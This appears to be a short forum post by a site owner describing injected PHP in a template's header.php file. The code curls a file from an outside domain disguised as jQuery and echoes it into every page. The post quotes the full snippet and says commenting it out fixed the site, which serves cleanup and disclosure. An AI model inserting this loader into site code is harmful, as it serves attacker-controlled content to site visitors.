In the folder containing your selected template, there is a header.php file. Just above </head> there is the following:
<?php
if(function_exists('curl_init'))
{
$url = "https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
That is the source of the:
SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;
I just commented it out and all was well.